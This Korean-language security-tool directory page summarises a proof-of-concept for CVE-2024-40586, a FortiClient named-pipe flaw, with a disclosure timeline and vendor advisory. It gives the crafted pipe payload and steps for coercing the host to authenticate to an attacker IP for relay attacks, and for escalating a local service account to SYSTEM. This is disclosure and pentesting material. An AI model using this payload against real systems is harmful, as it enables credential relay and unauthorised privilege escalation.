Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-40586-Windows-Coerced-Authentication-in-FortiClient — CVE-2024-40586 악용: 취약한 FortiClient 명명된 파이프를 통해 Windows 호스트가 인증하도록 강제하여 SYSTEM으로의 권한 상승 또는 릴레이 공격을 통한 수평 이동을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/hagrid29/cve-2024-40586-windows-coerced-authentication-in-forticlient
Privilege EscalationVulnerability AnalysisExploitationLateral MovementPenetration TestingAuthenticationRed Teaming
GitHubhagrid29/cve-2024-40586-windows-coerced-authentication-in-forticlient

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-40586-Windows-Coerced-Authentication-in-FortiClient

CVE-2024-40586 악용: 취약한 FortiClient 명명된 파이프를 통해 Windows 호스트가 인증하도록 강제하여 SYSTEM으로의 권한 상승 또는 릴레이 공격을 통한 수평 이동을 가능하게 합니다.

저장소 보기
141년 전아직 검토되지 않음

CVE-2024-40586 Windows 강제 인증 (FortiClient)

Windows 시스템에서 FortiClient (앱 버전 7.0.8.0427)가 원격 권한이 없는 사용자가 FortiSSLVPNdaemon 서비스의 명명된 파이프를 통해 Windows 호스트가 다른 머신에 인증하도록 강제할 수 있음이 발견되었습니다.

명명된 파이프 "FortiSslvpnNamedPipe"가 모든 사용자의 읽기 및 쓰기를 허용하는 것으로 확인되었습니다.

Fig1

분석

앱은 명명된 파이프에서 버퍼의 5번째 바이트를 연산 코드 PipeBuffer+4로 읽습니다.

Fig2

연산 코드가 24 (즉, 0x18)인 경우 앱이 파일을 읽는 것으로 확인되었습니다. 코드 흐름: Case 24 => LABEL_26 => strncpy가 페이로드를 변수 Buffer에 복사 => 페이로드를 sub_7FF60C3EAC20에 전달 => CreateFileA 호출 => ReadFile

Fig3

Fig4

Fig5

그러나 애플리케이션은 파일 내용에 대해 아무 작업도 수행하지 않습니다.

익스플로잇

취약한 명명된 파이프 "FortiSslvpnNamedPipe"에 조작된 트래픽 (즉, "\x00\x00\x00\x00\x18\x00"에 대상 경로를 연결)을 전송하여 연산 코드 24를 트리거하고 프로세스 "FortiSSLVPNdaemon.exe"가 SYSTEM 권한으로 CreateFileA를 호출하도록 강제할 수 있습니다. 따라서 UNC 경로 (예: "\\<원격 IP>\<파일 경로>")를 제출하여 서버가 원격 파일에 연결하도록 하거나 로컬 명명된 파이프 (예: "\\127.0.0.1\pipe\<명명된 파이프>")에 연결하도록 강제할 수 있습니다.

시나리오 1

원격 인증되지 않은 사용자로 Windows 호스트가 다른 머신에 인증하도록 강제하려면 다음 단계를 따르면 됩니다:

  1. 공격자 머신에서 강제 인증을 수신할 리스너를 시작합니다.
  2. 공격자 머신에서 조작된 페이로드 (즉, "\x00\x00\x00\x00\x18\x00" + "\\<공격자 IP>\fake\fake")를 피해자 머신의 취약한 명명된 파이프 "\\<피해자 IP>\pipe\FortiSslvpnNamedPipe"로 전송하여 프로세스가 UNC 경로 "\\<공격자 IP>\fake\fake"로 원격 파일에 연결하도록 강제합니다.
  3. 다른 강제 인증 공격 (예: SpoolSample)과 유사하게 공격자는 릴레이 공격 또는 인증 다운그레이드 공격을 수행할 수 있습니다.

Fig6

시나리오 2

"SeImpersonatePrivilege" (예: "nt authority\network service")를 가진 로컬 사용자가 SYSTEM으로 권한 상승을 수행하려면 다음 단계를 따르면 됩니다:

  1. 연결을 기다리는 명명된 파이프 서버를 생성합니다.
  2. 조작된 페이로드 (즉, "\x00\x00\x00\x00\x18\x00" + "\\127.0.0.1\pipe\<파이프 서버>\XXX")를 로컬 취약한 명명된 파이프 "\\.\pipe\FortiSslvpnNamedPipe"로 전송하여 프로세스가 우리의 명명된 파이프 서버에 연결하도록 강제합니다.
  3. 연결이 들어오면 ImpersonateNamedPipeClient()를 호출하여 SYSTEM 권한을 가장합니다.

Fig7

타임라인

  • 07/09/2023 - Fortinet에 취약점 보고
  • 08/30/2023 - Fortinet이 취약점 확인
  • 02/11/2024 - 공개

참고

  • https://fortiguard.fortinet.com/psirt/FG-IR-23-279
도구 다운로드